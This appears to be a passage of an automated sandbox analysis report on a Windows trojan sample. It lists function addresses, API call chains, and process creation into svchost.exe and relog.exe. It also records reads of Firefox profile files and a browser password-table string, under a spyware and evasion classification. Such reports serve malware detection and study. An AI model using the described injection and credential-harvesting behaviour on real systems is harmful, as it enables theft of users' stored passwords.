                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03672CC0 NtQueryVirtualMemory | 6_2_03672CC0
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03673010 NtOpenDirectoryObject | 6_2_03673010
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03673090 NtSetValueKey | 6_2_03673090
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03673D70 NtOpenThread | 6_2_03673D70
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_03673D10 NtOpenProcessToken | 6_2_03673D10
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_02EF9220 NtClose | 6_2_02EF9220
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_02EF9380 NtAllocateVirtualMemory | 6_2_02EF9380
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_02EF9080 NtReadFile | 6_2_02EF9080
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_02EF9170 NtDeleteFile | 6_2_02EF9170
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_02EF8F10 NtCreateFile | 6_2_02EF8F10
                Source: C:\Windows\SysWOW64\relog.exe | Code function: 6_2_0350F7D8 NtClose | 6_2_0350F7D8
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005FD5EB: CreateFileW,DeviceIoControl,CloseHandle | 0_2_005FD5EB
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock | 0_2_005F1201
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState | 0_2_005FE8F6
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_0059BF40 | 0_2_0059BF40
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00602046 | 0_2_00602046
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00598060 | 0_2_00598060
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005F8298 | 0_2_005F8298
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005CE4FF | 0_2_005CE4FF
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005C676B | 0_2_005C676B
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00624873 | 0_2_00624873
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_0059CAF0 | 0_2_0059CAF0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005BCAA0 | 0_2_005BCAA0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005ACC39 | 0_2_005ACC39
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005C6DD9 | 0_2_005C6DD9
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005AB119 | 0_2_005AB119
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005991C0 | 0_2_005991C0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B1394 | 0_2_005B1394
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B1706 | 0_2_005B1706
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B781B | 0_2_005B781B
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005A997D | 0_2_005A997D
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_00597920 | 0_2_00597920
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B19B0 | 0_2_005B19B0
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B7A4A | 0_2_005B7A4A
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B1C77 | 0_2_005B1C77
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B7CA7 | 0_2_005B7CA7
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_0061BE44 | 0_2_0061BE44
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005C9EEE | 0_2_005C9EEE
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_005B1F32 | 0_2_005B1F32
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe | Code function: 0_2_0165CFF0 | 0_2_0165CFF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418393 | 1_2_00418393
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004010B1 | 1_2_004010B1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042EAE3 | 1_2_0042EAE3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FB93 | 1_2_0040FB93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402399 | 1_2_00402399
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004023A0 | 1_2_004023A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00416593 | 1_2_00416593
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040DD93 | 1_2_0040DD93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FDB3 | 1_2_0040FDB3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040DEDF | 1_2_0040DEDF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004026E0 | 1_2_004026E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040DEE3 | 1_2_0040DEE3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402FE0 | 1_2_00402FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036FA352 | 1_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0364E3F0 | 1_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037003E6 | 1_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036E0274 | 1_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C02C0 | 1_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036C8158 | 1_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03630100 | 1_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036DA118 | 1_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036F81CC | 1_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036F41A2 | 1_2_036F41A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037001AA | 1_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036D2000 | 1_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640770 | 1_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03664750 | 1_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363C7C0 | 1_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0365C6E0 | 1_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640535 | 1_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03700591 | 1_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036F2446 | 1_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036E4420 | 1_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036EE4F6 | 1_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036FAB40 | 1_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036F6BD7 | 1_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363EA80 | 1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03656962 | 1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036429A0 | 1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0370A9A6 | 1_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0364A840 | 1_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03642840 | 1_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0366E8F0 | 1_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036268B8 | 1_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036B4F40 | 1_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03682F28 | 1_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03660F30 | 1_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036E2F30 | 1_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03632FC8 | 1_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036BEFA0 | 1_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640E59 | 1_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036FEE26 | 1_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036FEEDB | 1_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03652E90 | 1_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036FCE93 | 1_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0364AD00 | 1_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_036DCD1F | 1_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0363ADE0 | 1_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03658DBF | 1_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03640C00 | 1_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03630CF2 | 1_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E0CB51_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362D34C1_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F132D1_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0368739A1_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E12ED1_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365D2F01_2_0365D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B2C01_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036452A01_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367516C1_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362F1721_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370B16B1_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0364B1B01_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F70E91_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF0E01_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EF0CC1_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036470C01_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF7B01_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036856301_2_03685630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F16CC1_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F75711_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037095C31_2_037095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DD5B01_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036314601_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FF43F1_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFB761_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B5BF01_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367DBF91_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FB801_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B3A6C1_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFA491_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7A461_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EDAC61_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DDAAC1_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03685AA01_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E1AA31_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036499501_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365B9501_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D59101_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AD8001_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036438E01_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFF091_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD21_2_03603FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03603FD51_2_03603FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFFB11_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03641F921_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03649EB01_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F7D731_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03643D401_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F1D5A1_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365FDC01_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B9C321_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FFCF21_2_036FFCF2
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B630EA
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B63288
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B6B938
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B65158
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B64F38
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Code function: 5_2_03B83E88
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FA352
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0364E3F0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_037003E6
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036E0274
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036C02C0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036C8158
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03630100
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036DA118
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F81CC
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_037001AA
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036D2000
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03640770
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03664750
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0363C7C0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0365C6E0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03640535
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03700591
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F2446
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036E4420
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036EE4F6
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FAB40
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F6BD7
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0363EA80
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03656962
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036429A0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0370A9A6
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0364A840
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03642840
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0366E8F0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036268B8
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036B4F40
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03682F28
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03660F30
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036E2F30
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03632FC8
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036BEFA0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03640E59
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FEE26
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FEEDB
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03652E90
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FCE93
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0364AD00
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036DCD1F
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0363ADE0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03658DBF
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03640C00
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03630CF2
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036E0CB5
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0362D34C
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F132D
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0368739A
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036E12ED
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0365D2F0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0365B2C0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036452A0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0367516C
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0362F172
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0370B16B
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0364B1B0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F70E9
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FF0E0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036EF0CC
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036470C0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FF7B0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F16CC
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F7571
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036DD5B0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03631460
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FF43F
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FFB76
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036B5BF0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0367DBF9
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0365FB80
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036B3A6C
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FFA49
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F7A46
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036EDAC6
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036DDAAC
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03685AA0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036E1AA3
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03649950
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0365B950
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036D5910
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036AD800
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036438E0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FFF09
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FFFB1
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03641F92
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03649EB0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F7D73
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_03643D40
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036F1D5A
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0365FDC0
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036B9C32
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_036FFCF2
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EE1A30
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EE3310
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EE5110
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EDCB30
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EDAB10
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EFB860
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EDC910
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EDAC60
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_02EDAC5C
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0350E263
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0350E144
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0350D6C8
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0350E5FC
                Source: C:\Windows\SysWOW64\relog.exe Code function: 6_2_0350C978
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0362B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03687E54 appears 107 times
                Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 036BF290 appears 103 times
                Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 0362B970 appears 260 times
                Source: C:\Windows\SysWOW64\relog.exe Code function: String function: 03687E54 appears 99 times
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: String function: 005AF9F2 appears 31 times
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: String function: 005B0A30 appears 46 times
                Source: BDlwy8b7Km.exe, 00000000.00000003.1728807999.00000000046ED000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BDlwy8b7Km.exe
                Source: BDlwy8b7Km.exe, 00000000.00000003.1728666356.0000000004543000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BDlwy8b7Km.exe
                Source: BDlwy8b7Km.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@6/5
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_006037B5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005F10BF AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_006051CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_0061A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_0060648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Code function: 0_2_005942A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe File created: C:\Users\user\AppData\Local\Temp\autB67F.tmp
                Source: BDlwy8b7Km.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: relog.exe, 00000006.00000003.2226934536.0000000003141000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3559238568.0000000003141000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: BDlwy8b7Km.exe ReversingLabs: Detection: 70%
                Source: unknown Process created: C:\Users\user\Desktop\BDlwy8b7Km.exe "C:\Users\user\Desktop\BDlwy8b7Km.exe"
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BDlwy8b7Km.exe"
                Source: C:\Program Files (x86)\WDAlweIOEEYZFMpQlFKaYiJdndFRWcVrfFKrpNLwiPAk\FKUPIibLrFYhJ.exe Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
